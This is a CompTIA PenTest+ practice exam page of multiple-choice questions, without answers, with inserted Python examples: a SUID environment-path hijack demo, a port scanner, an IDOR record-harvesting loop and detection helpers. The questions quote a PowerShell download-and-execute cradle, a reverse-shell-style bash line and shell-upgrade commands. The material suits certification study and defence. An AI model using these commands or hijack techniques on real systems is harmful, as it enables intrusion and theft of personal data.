
CompTIA PT0-001 CompTIA PenTest+ Exam Practice Test

Note: The PT0-001 exam is now retired. Please select the replacement exam for your certification; the new exam code is PT0-002.
Page: 1 / 29
Total 294 questions

CompTIA PenTest+ Exam Questions and Answers

Question 1

At the information gathering stage, a penetration tester is trying to passively identify the technology running on a client’s website. Which of the following approaches should the penetration tester take?

Options:

A.

Run a spider scan in Burp Suite.

B.

Use web aggregators such as BuiltWith and Netcraft.

C.

Run a web scraper and pull the website’s content.

D.

Use Nmap to fingerprint the website’s technology.

Question 2

A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?

Options:

A.

Command injection attack

B.

Clickjacking attack

C.

Directory traversal attack

D.

Remote file inclusion attack
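The point behind question 2 is that a missing Content-Security-Policy header only exposes the page to framing if the older X-Frame-Options header is absent as well, and that a CSP without a frame-ancestors directive gives no framing protection at all. The following check, added here as an example and not part of the exam material, encodes those rules; the header sets used to exercise it are constructed.

```python
"""Added example: decide from response headers whether a page can be framed
by an arbitrary third-party site (the precondition for clickjacking).
Not part of the original question set; the header values are constructed.
"""
from typing import List, Mapping, Optional


def _frame_ancestors(csp: str) -> Optional[List[str]]:
    """Return the frame-ancestors source list from a CSP value, or None if absent."""
    for directive in csp.split(";"):
        tokens = directive.strip().split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None


def framing_allowed(headers: Mapping[str, str]) -> bool:
    """True if any origin may embed this response in a frame."""
    h = {k.lower(): v for k, v in headers.items()}   # header names are case-insensitive
    csp = h.get("content-security-policy")
    if csp is not None:
        sources = _frame_ancestors(csp)
        if sources is not None:
            # CSP frame-ancestors overrides X-Frame-Options when both are present.
            # An empty source list is equivalent to 'none'; only a wildcard or a
            # bare scheme source lets any site frame the page.
            return any(s in ("*", "http:", "https:") for s in sources)
        # A CSP with no frame-ancestors directive says nothing about framing.
    xfo = h.get("x-frame-options", "").strip().lower()
    if xfo in ("deny", "sameorigin"):
        return False
    # No header, or an invalid value browsers ignore (e.g. ALLOWALL): framable.
    return True
```

In an engagement you would feed this the headers from `requests.get(url).headers`; a `True` result on a page with sensitive clickable actions is what justifies building a clickjacking proof of concept.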

Question 3

Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO)

Options:

A.

The tester discovers personally identifiable data on the system

B.

The system shows evidence of prior unauthorized compromise

C.

The system shows a lack of hardening throughout

D.

The system becomes unavailable following an attempted exploit

E.

The tester discovers a finding on an out-of-scope system

Question 4

A consultant wants to scan all the TCP ports on an identified device. Which of the following Nmap switches will complete this task?

Options:

A.

-p-

B.

-p ALL

C.

-p 1-65534

D.

-port 1-65534

Question 5

A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?

Options:

A.

Stored XSS

B.

Full path disclosure

C.

Expired certificate

D.

Clickjacking

Question 6

After successfully exploiting a local file inclusion vulnerability within a web application, a limited reverse shell is spawned back to the penetration tester's workstation. Which of the following can be used to escape the limited shell and create a fully functioning TTY?

Options:

A.

perl -e ':set shell=/bin/bash:shell'

B.

php -r '$shell=fshellopen("/bin/bash");exec($shell)'

C.

bash -i >& /dev/localhost 0>&1

D.

python -c 'import pty;pty.spawn("/bin/bash")'

Question 7

When calculating the sales price of a penetration test to a client, which of the following is the MOST important aspect to understand?

Options:

A.

The operating cost

B.

The client's budget

C.

The required scope of work

D.

The non-disclosure agreement

Question 8

(Exhibit: the packet sample shown by the network administrator is not reproduced here.)

A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?

Options:

A.

SNMP brute forcing

B.

ARP spoofing

C.

DNS cache poisoning

D.

SMTP relay

Question 9

Which of the following would BEST prevent fence jumping at a facility?

Options:

A.

Install proper lighting around the perimeter of the facility.

B.

Decrease the distance between the links in the fence.

C.

Add a top guard on the fence that faces away from the facility.

D.

Place video cameras that are angled toward the fence.

Question 10

Which of the following has a direct and significant impact on the budget of the security assessment?

Options:

A.

Scoping

B.

Scheduling

C.

Compliance requirement

D.

Target risk

Question 11

A client has voiced concern about the number of companies being breached by remote attackers who are looking for trade secrets. Which of the following BEST describes the type of adversary this would identify?

Options:

A.

Script kiddies

B.

APT actors

C.

Insider threats

D.

Hacktivist groups

Question 12

After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user’s folder titled “changepass”:

-rwsr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass

Using “strings” to print ASCII printable characters from changepass, the tester notes the following:

$ strings changepass

Exit

setuid

strcmp

GLIBC_2.0

ENV_PATH

%s/changepw

malloc

strlen

Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?

Options:

A.

Copy changepass to a writable directory and export the ENV_PATH environment variable to the path of a token-stealing binary titled changepw. Then run changepass.

B.

Create a copy of changepass in the same directory, naming it changepw. Export the ENV_PATH environment variable to the path "/home/user". Then run changepass.

C.

Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary title changepw

D.

Run changepass within the current directory with sudo after exporting the ENV_PATH environment variable to the path "/usr/local/bin".
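What the strings output in question 12 implies is a SUID-root binary that reads ENV_PATH from its environment, formats "%s/changepw" with it, and executes the result, so whoever controls ENV_PATH chooses which file runs with root's privileges. The script below, added here as an example and not taken from the exam or from any real changepass binary, reproduces that control flow in Python so the hijack can be run locally as an unprivileged user: the stand-in "binary" is a normal process and the payload only echoes its identity. The helper path, the default directory and the payload are assumptions for the demo. Note that the dynamic loader strips variables such as LD_PRELOAD for setuid programs, but an application-defined variable like ENV_PATH passes straight through.

```python
"""Added example (not exam code): an environment-controlled helper path of the
kind strings revealed in changepass, and the hardened version beside it.
Paths, the helper name and the payload are assumptions for the demo.
"""
import os
import stat
import subprocess
import tempfile


def helper_path(env: dict, default_dir: str = "/usr/sbin") -> str:
    """What the vulnerable binary does: honour ENV_PATH when the caller sets it."""
    base = env.get("ENV_PATH", default_dir)
    return "%s/changepw" % base              # the "%s/changepw" format string from strings


def helper_path_hardened(env: dict) -> str:
    """Fix: a privileged helper must not take its search path from the environment."""
    return "/usr/sbin/changepw"              # fixed absolute path, nothing from env


def run_vulnerable(env: dict) -> str:
    """Execute the helper exactly as the SUID binary would: path derived from env."""
    result = subprocess.run([helper_path(env)], capture_output=True, text=True, env=env)
    return result.stdout.strip()


def demo() -> str:
    """Attacker side: writable directory + fake changepw, export ENV_PATH, run it."""
    with tempfile.TemporaryDirectory() as writable_dir:
        fake = os.path.join(writable_dir, "changepw")
        with open(fake, "w") as f:
            # A real payload would spawn a root shell; here it just reports who ran it.
            f.write("#!/bin/sh\necho hijacked-by-$(id -un 2>/dev/null || echo unknown)\n")
        os.chmod(fake, stat.S_IRWXU)
        env = dict(os.environ, ENV_PATH=writable_dir)   # export ENV_PATH=<writable dir>
        return run_vulnerable(env)


if __name__ == "__main__":
    print(demo())
```

This is why option C is the cheapest path: nothing has to be copied, only ENV_PATH has to point at a directory the low-privilege user can write to. The check before trying it on a real target is `ldd`/`strings` for a hard-coded fallback and confirming the binary really is SUID (`ls -l` shows the `s` bit, as in the listing above).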

Question 13

A penetration tester has performed a vulnerability scan of a specific host that contains a valuable database and has identified the following vulnerabilities:

  • XSS
  • HTTP DELETE method allowed
  • SQL injection
  • Vulnerable to CSRF

To which of the following should the tester give the HIGHEST priority?

Options:

A.

SQL injection

B.

HTTP DELETE method allowed

C.

Vulnerable to CSRF

D.

XSS

Question 14

Instructions:

Analyze the code segments to determine which sections are needed to complete a port scanning script.

Drag the appropriate elements into the correct locations to complete the script.


During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

(Simulation exhibit: the script and the draggable code segments are not reproduced here.)

Options:
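The simulation in question 14 asks for a port scanner that runs from a pivot host with only a limited interface, which in practice means a TCP connect() scan written in whatever interpreter the box has. The script below is an added example, not the exam's drag-and-drop script: it opens a listener on 127.0.0.1 so the scan has one known-open port to find offline, then scans a small range around it. The host and the range are constructed for the demo; the full-range equivalent of Nmap's `-p-` from question 4 is `range(1, 65536)`.

```python
"""Added example (not the exam's script): a minimal TCP connect() port scanner
of the kind you would run from a pivot host, with a local listener so it can
be exercised offline. Target and range are constructed for the demo.
"""
import socket
import threading
from typing import Iterable, List, Tuple


def scan_ports(host: str, ports: Iterable[int], timeout: float = 0.3) -> List[int]:
    """connect() scan: a completed three-way handshake means the port is open.
    Closed ports return ECONNREFUSED at once; filtered ones hit the timeout."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)                  # don't hang on filtered ports
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return sorted(open_ports)


def _serve(sock: socket.socket, stop: threading.Event) -> None:
    """Accept and immediately drop connections until told to stop."""
    sock.settimeout(0.2)
    while not stop.is_set():
        try:
            conn, _ = sock.accept()
            conn.close()
        except socket.timeout:
            continue


def demo() -> Tuple[int, List[int]]:
    """Open one local listener, scan the ports around it, return (port, found)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))                # OS picks a free port
    listener.listen(5)
    port = listener.getsockname()[1]
    stop = threading.Event()
    t = threading.Thread(target=_serve, args=(listener, stop), daemon=True)
    t.start()
    try:
        found = scan_ports("127.0.0.1", range(port - 5, port + 6))
    finally:
        stop.set()
        t.join()
        listener.close()
    return port, found


if __name__ == "__main__":
    listening_on, open_ports = demo()
    print("listener on %d, open ports found: %s" % (listening_on, open_ports))
```

Across an isolated network the scan is serial and noisy; a real pivot script would thread the connects and shorten the timeout, but the open/closed logic stays the same.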

Question 15

A static code analysis report of a web application can be leveraged to identify:

Options:

A.

business logic flaws.

B.

insufficient input sanitization.

C.

session fixation issues.

D.

client-side data storage.

E.

clickjacking.

Question 16

A client’s systems administrator requests a copy of the report from the penetration tester, but the systems administrator is not listed as a point of contact or signatory. Which of the following is the penetration tester’s BEST course of action?

Options:

A.

Send the report since the systems administrator will be in charge of implementing the fixes.

B.

Send the report and carbon copy the point of contact/signatory for visibility.

C.

Reply and explain to the systems administrator that proper authorization is needed to provide the report.

D.

Forward the request to the point of contact/signatory for authorization.

Question 17

A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks:

  • Code review
  • Updates to firewall settings

Which of the following has occurred in this situation?

Options:

A.

Scope creep

B.

Post-mortem review

C.

Risk acceptance

D.

Threat prevention

Question 18

A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?

Options:

A.

Download the GHOST file to a Linux system and compile:

gcc -o GHOST

Test it:

./GHOST

B.

Download the GHOST file to a Windows system and compile:

gcc -o GHOST GHOST.c

Test it:

./GHOST

C.

Download the GHOST file to a Linux system and compile:

gcc -o GHOST GHOST.c

Test it:

./GHOST

D.

Download the GHOST file to a Windows system and compile:

gcc -o GHOST

Test it:

./GHOST

Question 19

A penetration tester locates a few unquoted service paths during an engagement. Which of the following can the tester attempt to do with these?

Options:

A.

Attempt to crack the service account passwords.

B.

Attempt DLL hijacking attacks.

C.

Attempt to locate weak file and folder permissions.

D.

Attempt privilege escalation attacks.

Question 20

A system security engineer is preparing to conduct a security assessment of some new applications. The applications were provided to the engineer as a set that contains only JAR files. Which of the following would be the MOST detailed method to gather information on the inner workings of these applications?

Options:

A.

Launch the applications and use dynamic software analysis tools, including fuzz testing

B.

Use a static code analyzer on the JAR files to look for code quality deficiencies

C.

Decompile the applications to approximate source code and then conduct a manual review

D.

Review the details and extensions of the certificate used to digitally sign the code and the application

Question 21

Which of the following commands will allow a tester to enumerate potential unquoted services paths on a host?

Options:

A.

wmic environment get name,variablevalue,username | findstr /i "Path" | findstr /i "service"

B.

wmic service get /format:hform > c:\temp\services.html

C.

wmic startup get caption,location,command | findstr /i "service" | findstr /v /i "%"

D.

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
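Questions 19 and 21 turn on the same Windows behaviour: when a service's ImagePath is unquoted and contains spaces, CreateProcess tries each space-delimited prefix with ".exe" appended before it reaches the real binary, so a writable directory anywhere along that path gives the tester code execution as the service account. The script below, an added example rather than exam material, parses the output format of `wmic service get name,pathname,startmode /format:csv`, applies the same filters as option D's findstr chain (auto-start, outside C:\Windows, not quoted), and lists the candidate files Windows would try first. The service rows are constructed; the parsing deliberately avoids the csv module because it would strip the very quotes the check needs to see.

```python
"""Added example (not from the exam): enumerate unquoted service paths from
wmic /format:csv output and list the hijack candidates CreateProcess would
try first. The sample rows and service names are constructed.
"""
from typing import Dict, List

SAMPLE_WMIC_CSV = "\n".join([
    "",                                   # wmic prints a leading blank line
    "Node,Name,PathName,StartMode",
    r"WS01,AcmeSvc,C:\Program Files\Acme Corp\Updater\acmesvc.exe,Auto",
    r'WS01,GoodSvc,"C:\Program Files\Good\good.exe" -service,Auto',
    r"WS01,Spooler,C:\Windows\System32\spoolsv.exe,Auto",
    r"WS01,NoSpace,C:\Tools\nospace.exe -run,Auto",
    r"WS01,ManualSvc,C:\Program Files\Manual Tool\manual.exe,Manual",
])


def parse_wmic_csv(text: str) -> List[Dict[str, str]]:
    """Split on the first two and the last comma: PathName may contain commas,
    and the csv module would drop the quotes we need to inspect."""
    rows = []
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header = lines[0].split(",")
    for ln in lines[1:]:
        parts = ln.split(",")
        node, name, startmode = parts[0], parts[1], parts[-1]
        pathname = ",".join(parts[2:-1])
        rows.append(dict(zip(header, [node, name, pathname, startmode])))
    return rows


def executable_part(pathname: str) -> str:
    """Drop service arguments: keep everything up to and including the first '.exe'."""
    low = pathname.lower()
    i = low.find(".exe")
    return pathname[: i + 4] if i != -1 else pathname.split(" ")[0]


def hijack_candidates(exe: str) -> List[str]:
    """Files CreateProcess looks for before the real binary: each prefix that
    ends at a space, with '.exe' appended, in search order."""
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def find_unquoted_service_paths(text: str) -> Dict[str, List[str]]:
    """Auto-start services whose binary path is unquoted, contains a space and
    lives outside C:\\Windows, mapped to the paths an attacker could plant."""
    findings = {}
    for row in parse_wmic_csv(text):
        path = row["PathName"].strip()
        if row["StartMode"].lower() != "auto" or path.startswith('"'):
            continue                                   # quoted: no ambiguity
        if path.lower().startswith("c:\\windows\\"):
            continue                                   # not writable by normal users
        exe = executable_part(path)
        if " " in exe:
            findings[row["Name"]] = hijack_candidates(exe)
    return findings


if __name__ == "__main__":
    for svc, candidates in find_unquoted_service_paths(SAMPLE_WMIC_CSV).items():
        print(svc, "->", candidates)
```

The finding only becomes the privilege escalation of question 19 when `icacls` shows that one of the candidate directories (here C:\ or C:\Program Files\) is writable by the current user and the service runs as LocalSystem or another higher-privileged account; otherwise it is a hardening note, not an exploit.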

Question 22

While engaging clients for a penetration test from highly regulated industries, which of the following is usually the MOST important to the clients from a business perspective?

Options:

A.

Letter of engagement and attestation of findings

B.

NDA and MSA

C.

SOW and final report

D.

Risk summary and executive summary

Question 23

A tester has determined that null sessions are enabled on a domain controller. Which of the following attacks can be performed to leverage this vulnerability?

Options:

A.

RID cycling to enumerate users and groups

B.

Pass the hash to relay credentials

C.

Password brute forcing to log into the host

D.

Session hijacking to impersonate a system account

Question 24

During an engagement, an insecure direct object reference vulnerability was discovered that allows the extraction of highly sensitive PII. The tester is required to extract and then exfiltrate the information from a web application with identifiers 1 through 1000 inclusive. When running the following script, an error is encountered:

(Exhibit: the full script is not reproduced here; the candidate lines appear in the options below.)

Which of the following lines of code is causing the problem?

Options:

A.

url = "https://www.comptia.org?id="

B.

req = requests.get(url)

C.

if req.status == 200:

D.

url += i
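Two of the lines in question 24 are wrong in the `requests` library, but only one of them is reached: `url += i` raises TypeError (str plus int) before any request is made, and even `url += str(i)` would keep appending to the same string so the ids would become 1, 12, 123 instead of being replaced; `req.status` would then fail too, because a Response exposes `status_code`. The script below is an added example, not the exam's script: it keeps the exam's placeholder host, injects the fetch function so nothing leaves the machine, and walks the inclusive 1..1000 range correctly. The record store is constructed test data.

```python
"""Added example (not the exam's script): the IDOR enumeration loop from
question 24 with the bug kept visible in buggy_append() and the working loop
in extract_records(). FAKE_RECORDS and fake_fetch are constructed stand-ins
for the vulnerable application; pass requests.get as fetch for a real target.
"""
from typing import Callable, Dict

BASE = "https://www.comptia.org?id="     # placeholder host from the question


class FakeResponse:
    """The two attributes of requests.Response the loop needs."""

    def __init__(self, status_code: int, text: str):
        self.status_code = status_code   # requests names it status_code, not status
        self.text = text


FAKE_RECORDS = {1: "alice,SSN-1", 2: "bob,SSN-2", 5: "eve,SSN-5"}   # constructed


def fake_fetch(url: str) -> FakeResponse:
    """Offline stand-in for requests.get against the vulnerable endpoint."""
    ident = int(url.rsplit("=", 1)[1])
    if ident in FAKE_RECORDS:
        return FakeResponse(200, FAKE_RECORDS[ident])
    return FakeResponse(404, "")


def buggy_append(url: str, ident: int) -> str:
    """The exam's `url += i`: raises TypeError, and would accumulate if str(i)."""
    url += ident
    return url


def build_url(base: str, ident: int) -> str:
    """Build a fresh URL for every identifier instead of mutating one string."""
    return base + str(ident)


def extract_records(fetch: Callable[[str], FakeResponse],
                    first: int = 1, last: int = 1000) -> Dict[int, str]:
    """Walk ids first..last inclusive and keep every record the app returns."""
    records = {}
    for ident in range(first, last + 1):      # range() excludes the stop value
        resp = fetch(build_url(BASE, ident))
        if resp.status_code == 200:
            records[ident] = resp.text
    return records


if __name__ == "__main__":
    print(extract_records(fake_fetch, 1, 10))
```

On an engagement the harvested records go straight into an encrypted container and the count, not the contents, goes in the report; extracting all 1000 is only justified if the scope explicitly requires proving the full exposure.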

Question 25

A penetration tester successfully exploits a DMZ server that appears to be listening on an outbound port. The penetration tester wishes to forward that traffic back to a device. Which of the following are the BEST tools to use for this purpose? (Select TWO)

Options:

A.

Tcpdump

B.

Nmap

C.

Wireshark

D.

SSH

E.

Netcat

F.

Cain and Abel

Question 26

Which of the following tools can be used to perform a basic remote vulnerability scan of a website's configuration?

Options:

A.

Mimikatz

B.

BeEF

C.

Nikto

D.

Patator

Question 27

Consider the following PowerShell command:

powershell.exe IEX (New-Object Net.WebClient).DownloadString("http://site/script.ps1");Invoke-Cmdlet

Which of the following BEST describes the action performed by this command?

Options:

A.

Set the execution policy

B.

Execute a remote script

C.

Run an encoded command

D.

Instantiate an object
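The command in question 27 is a download cradle: `New-Object Net.WebClient` instantiates the client, `DownloadString` fetches the script body, and `IEX` (Invoke-Expression) executes it in memory without touching disk or the execution policy. The three distractors are the patterns a detection engineer distinguishes from it in process-creation logs. The classifier below is an added example, not exam material; its command lines are constructed samples and the regexes are a starting point, not a complete signature set.

```python
"""Added example (not from the exam): classify PowerShell command lines such as
the cradle in question 27 the way a process-creation detection would. The
sample command lines are constructed; the patterns are illustrative.
"""
import re
from typing import Dict, List

# Execution of fetched content.
_EXEC = re.compile(r"(?i)\bIEX\b|Invoke-Expression")
# Anything that pulls content over the network.
_DOWNLOAD = re.compile(
    r"(?i)Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b"
)
# -e, -ec, -en..., -enc, -EncodedCommand followed by a base64 blob (PowerShell
# accepts any unambiguous prefix of the parameter name).
_ENCODED = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+[A-Za-z0-9+/=]{8,}")
# -ExecutionPolicy Bypass / -ep unrestricted and friends.
_EP_BYPASS = re.compile(r"(?i)-e(?:x[a-z]*|p)\s+(?:bypass|unrestricted)")


def classify(cmdline: str) -> List[str]:
    """Return the behaviours seen in one command line, in a fixed order."""
    tags = []
    download = bool(_DOWNLOAD.search(cmdline))
    execute = bool(_EXEC.search(cmdline))
    if download and execute:
        tags.append("remote-script-execution")   # the cradle: fetch + IEX
    elif download:
        tags.append("remote-download")            # staging, no in-memory exec yet
    if _ENCODED.search(cmdline):
        tags.append("encoded-command")
    if _EP_BYPASS.search(cmdline):
        tags.append("execution-policy-bypass")
    return tags


SAMPLE_CMDLINES = [   # constructed
    'powershell.exe IEX (New-Object Net.WebClient).DownloadString("http://site/script.ps1");Invoke-Cmdlet',
    "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "powershell.exe Get-Process | Out-File procs.txt",
    "powershell.exe -c \"(New-Object Net.WebClient).DownloadFile('http://x/a.exe','a.exe')\"",
]


def classify_all(cmdlines: List[str] = SAMPLE_CMDLINES) -> Dict[str, List[str]]:
    """Classify a batch of command lines, e.g. from Sysmon event ID 1."""
    return {c: classify(c) for c in cmdlines}


if __name__ == "__main__":
    for line, tags in classify_all().items():
        print(tags, "<-", line)
```

An encoded command hides all of these keywords from the command line, which is why a real detection decodes the `-enc` payload (UTF-16LE base64) and runs the same classifier over the result, and why PowerShell script-block logging is the more reliable data source.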

Question 28

A penetration tester has gained physical access to a facility and connected directly into the internal network. The penetration tester now wants to pivot into the server VLAN. Which of the following would accomplish this?

Options:

A.

Spoofing a printer’s MAC address

B.

Abusing DTP negotiation

C.

Performing LLMNR poisoning

D.

Conducting an STP attack

Question 29

At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computers names, and office locations. The file is hosted on a public web server. Which of the following BEST describes the technique that was used to obtain this information?

Options:

A.

Enumeration of services

B.

OSINT gathering

C.

Port scanning

D.

Social engineering

Question 30

An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?

Options:

A.

Selection of the appropriate set of security testing tools

B.

Current and load ratings of the ICS components

C.

Potential operational and safety hazards

D.

Electrical certification of hardware used in the test

Question 31

While conducting information gathering, a penetration tester is trying to identify Windows hosts. Which of the following characteristics would be BEST to use for fingerprinting?

Options:

A.

The system responds with a MAC address that begins with 00:0A:3B.

B.

The system responds with port 22 open.

C.

The system responds with a TTL of 128.

D.

The system responds with a TCP window size of 5840.

Question 32

Which of the following would be BEST for performing passive reconnaissance on a target's external domain?

Options:

A.

Peach

B.

CeWL

C.

OpenVAS

D.

Shodan

Question 33

Which of the following BEST describes why an MSA is helpful?

Options:

A.

It contractually binds both parties to not disclose vulnerabilities.

B.

It reduces potential for scope creep.

C.

It clarifies the business arrangement by agreeing to specific terms.

D.

It defines the timelines for the penetration test.

Question 34

While performing privilege escalation on a Windows 7 workstation, a penetration tester identifies a service that imports a DLL by name rather than an absolute path. To exploit this vulnerability, which of the following criteria must be met?

Options:

A.

Permissions not disabled in the DLL

B.

Weak folder permissions of a directory in the DLL search path

C.

Write permissions in the C:\Windows\System32\imports directory

D.

DLL not cryptographically signed by the vendor

Question 35

A penetration tester is designing a phishing campaign and wants to build a list of users for the target organization. Which of the following techniques would be the MOST appropriate? (Select TWO)

Options:

A.

Query an Internet WHOIS database.

B.

Search posted job listings.

C.

Scrape the company website.

D.

Harvest users from social networking sites.

E.

Socially engineer the corporate call center.

Question 36

A penetration tester runs the following from a compromised box: python -c 'import pty;pty.spawn("/bin/bash")'. Which of the following actions is the tester taking?

Options:

A.

Removing the Bash history

B.

Upgrading the shell

C.

Creating a sandbox

D.

Capturing credentials

Question 37

You are a penetration tester running port scans on a server.

INSTRUCTIONS

Part1: Given the output, construct the command that was used to generate this output from the available options.

Part2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.


(Simulation exhibit: the scan output and the command-construction options for Part 1 and Part 2 are not reproduced here.)

Question 38

While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?

Options:

A.

HKEY_CLASSES_ROOT

B.

HKEY_LOCAL_MACHINE

C.

HKEY_CURRENT_USER

D.

HKEY_CURRENT_CONFIG

Question 39

A penetration testing company is performing a penetration test against Company A. Company A has provided the IP address range 10.0.0.0/24 as its in-scope network range. During the information gathering phase, the penetration tester is asked to conduct active information-gathering techniques. Which of the following is the BEST tool to use for active information gathering?

Options:

A.

hping3

B.

theHarvester

C.

tcpdump

D.

Nmap

Question 40

After an Nmap NSE scan, a security consultant is seeing inconsistent results while scanning a host. Which of the following is the MOST likely cause?

Options:

A.

Services are not listening

B.

The network administrator shut down services

C.

The host was not reachable

D.

A firewall/IPS blocked the scan

Question 41

Which of the following attacks is commonly combined with cross-site scripting for session hijacking?

Options:

A.

CSRF

B.

Clickjacking

C.

SQLI

D.

RFI

Question 42

While prioritizing findings and recommendations for an executive summary, which of the following considerations would be MOST valuable to the client?

Options:

A.

Levels of difficulty to exploit identified vulnerabilities

B.

Time taken to accomplish each step

C.

Risk tolerance of the organization

D.

Availability of patches and remediations

Question 43

Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this?

Options:

A.

Manufacturers developing IoT devices are less concerned with security.

B.

It is difficult for administrators to implement the same security standards across the board.

C.

IoT systems often lack the hardware power required by more secure solutions.

D.

Regulatory authorities often have lower security requirements for IoT systems.

Question 44

Which of the following actions BEST matches a script kiddie's threat actor?

Options:

A.

Exfiltrate network diagrams to perform lateral movement

B.

Steal credit cards from the database and sell them in the deep web

C.

Install a rootkit to maintain access to the corporate network

D.

Deface the website of a company in search of retribution
